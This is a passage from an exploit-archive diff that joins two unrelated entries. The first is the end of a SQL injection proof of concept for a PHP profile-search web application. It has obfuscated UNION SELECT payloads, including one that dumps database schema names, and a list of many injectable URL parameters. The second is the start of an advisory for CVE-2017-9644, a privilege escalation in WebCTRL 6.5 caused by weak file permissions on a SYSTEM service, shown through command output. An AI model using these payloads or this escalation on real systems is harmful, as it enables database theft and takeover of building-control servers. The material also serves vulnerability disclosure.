 # Proof of Concept:
 # 
 # http://localhost/[PATH]/viewprofile.php?id=[SQL]
 #
 # -MUS00053'+/*!11100uNiOn*/(/*!11100sElEct*/0x283129,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729,0x28343829,0x28343929,0x28353029,0x28353129,0x28353229,0x28353329,0x28353429,0x28353529,0x28353629,0x28353729,0x28353829,0x28353929,0x28363029,0x28363129,0x28363229,0x28363329,0x28363429,0x28363529,0x28363629,0x28363729,0x28363829,0x28363929,0x28373029,0x28373129,0x28373229,0x28373329,0x28373429,0x28373529,0x28373629,0x28373729,0x28373829,0x28373929,0x28383029,0x28383129,0x28383229,0x28383329,0x28383429,0x28383529,0x28383629,0x28383729,0x28383829,0x28383929,0x28393029,0x28393129,0x28393229,0x28393329,0x28393429,0x28393529,0x28393629,0x28393729,0x28393829,0x28393929,0x2831303029,0x2831303129,0x2831303229,0x2831303329,0x2831303429,0x2831303529,0x2831303629,0x2831303729,0x2831303829,0x2831303929,0x2831313029,0x2831313129,0x2831313229,0x2831313329,0x2831313429,0x2831313529,0x2831313629,0x2831313729,0x2831313829,0x2831313929,0x2831323029,0x2831323129,0x2831323229,0x2831323329,0x2831323429,0x2831323529,0x2831323629,0x2831323729,0x2831323829,0x2831323929,0x2831333029,0x2831333129,0x2831333229,0x2831333329,0x2831333429,0x2831333529,0x2831333629,0x2831333729,0x2831333829,0x2831333929,0x2831343029,0x2831343129,0x2831343229,0x2831343329,0x2831343429,0x2831343529,0x2831343629,0x2831343729,0x2831343829,0x2831343929,0x2831353029,0x2831353129,0x2831353229,0x2831353329,0x2831353429,0x2831353529,0x2831353629,0x2831353729,0x2831353829,0x2831353929,0x2831363029,0x2831363129,0x2831363229,0x2831363329,0x2831363429,0x2831363529,0x2831363629,0x2831363729,0x2831363829,0x2831363929,0x2831373029,0x2831373129,0x2831373229,0x2831373329,0x2831373429,0x2831373529,0x2831373629,0x2831373729,0x2831373829,0x2831373929,0x2831383029,0x2831383129,/*!50000dataBase*/(),0x2831383329)--+-
 #
 # http://localhost/[PATH]/load_caste_state_city.php?list_type=caste&&parent_id=[SQL]
 #
 # -1+/*!22255union*/+/*!22255+sElEct*/+0x31,(/*!22255+sElEct*/+eXpoRt_Set(5,@:=0,(/*!22255+sElEct*/+count(*)fROm(iNformatiOn_sChemA.colUmns)/*!22255where*/@:=eXpoRt_Set(5,eXpoRt_Set(5,@,table_name,0x3c6c693e,2),cOlumN_naMe,0xa3a,2)),@,2)),0x33--+-
 #
 # http://localhost/[PATH]/printprofile.php?id=[SQL]
 # http://localhost/[PATH]/viewphoto.php?id=[SQL]
 # http://localhost/[PATH]/advsearch_results.php?gender=[SQL]
 # http://localhost/[PATH]/advsearch_results.php?age1=[SQL]
 # http://localhost/[PATH]/advsearch_results.php?age2=[SQL]
 # http://localhost/[PATH]/advsearch_results.php?religion=[SQL]
 # http://localhost/[PATH]/advsearch_results.php?caste=[SQL]
 # http://localhost/[PATH]/advsearch_results.php?ms=[SQL]
 # http://localhost/[PATH]/advsearch_results.php?language=[SQL]
 # http://localhost/[PATH]/advsearch_results.php?edu=[SQL]
 # http://localhost/[PATH]/advsearch_results.php?occu=[SQL]
 # http://localhost/[PATH]/advsearch_results.php?country=[SQL]
 #
 # Etc..
 # # # # #
--- a/platforms/windows/local/42542.txt
+++ b/platforms/windows/local/42542.txt
@ -0,0 +1,84 @@
 Automated Logic WebCTRL 6.5 Insecure File Permissions Privilege Escalation
 Vendor: Automated Logic Corporation
 Product web page: http://www.automatedlogic.com
 Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior
                  ALC WebCTRL, SiteScan Web 6.1 and prior
                  ALC WebCTRL, i-Vu 6.0 and prior
                  ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
                  ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
 Summary: WebCTRL®, Automated Logic's web-based building automation
 system, is known for its intuitive user interface and powerful integration
 capabilities. It allows building operators to optimize and manage
 all of their building systems - including HVAC, lighting, fire, elevators,
 and security - all within a single HVAC controls platform. It's everything
 they need to keep occupants comfortable, manage energy conservation measures,
 identify key operational problems, and validate the results.
 Desc: WebCTRL server/service suffers from an elevation of privileges vulnerability
 which can be used by a simple authenticated user that can change the executable
 file with a binary of choice. The vulnerability exist due to the improper permissions,
 with the 'M' flag (Modify) or 'C' flag (Change) for 'Authenticated Users' group.
 The application suffers from an unquoted search path issue as well impacting the service
 'WebCTRL Service' for Windows deployed as part of WebCTRL server solution. This could
 potentially allow an authorized but non-privileged local user to execute arbitrary
 code with elevated privileges on the system. A successful attempt would require the
 local user to be able to insert their code in the system root path undetected by the
 OS or other security applications where it could potentially be executed during
 application startup or reboot. If successful, the local user’s code would execute
 with the elevated privileges of the application.
 Tested on: Microsoft Windows 7 Professional SP1 (EN)
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2017-5429
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5429.php
 CVE ID: CVE-2017-9644
 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9644
 30.01.2017
 ---
 sc qc "WebCTRL Service"
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: Webctrl Service
 TYPE : 20 WIN32_SHARE_PROCESS 
 START_TYPE : 2 AUTO_START
 ERROR_CONTROL : 1 NORMAL
 BINARY_PATH_NAME : C:\WebCTRL6.0\WebCTRL Service.exe -run
 LOAD_ORDER_GROUP : 
 TAG : 0
 DISPLAY_NAME : WebCTRL Service 6.0
 DEPENDENCIES : 
 SERVICE_START_NAME : LocalSystem
 cacls "C:\WebCTRL6.0\WebCTRL Service.exe"
 C:\WebCTRL6.0\WebCTRL Service.exe
  BUILTIN\Administrators:(ID)F 
  NT AUTHORITY\SYSTEM:(ID)F 
  BUILTIN\Users:(ID)R 
  NT AUTHORITY\Authenticated Users:(ID)C
 cacls "C:\WebCTRL6.0\WebCTRL Server.exe"
 C:\WebCTRL6.0\WebCTRL Server.exe
  BUILTIN\Administrators:(ID)F 
  NT AUTHORITY\SYSTEM:(ID)F 
  BUILTIN\Users:(ID)R 
  NT AUTHORITY\Authenticated Users:(ID)C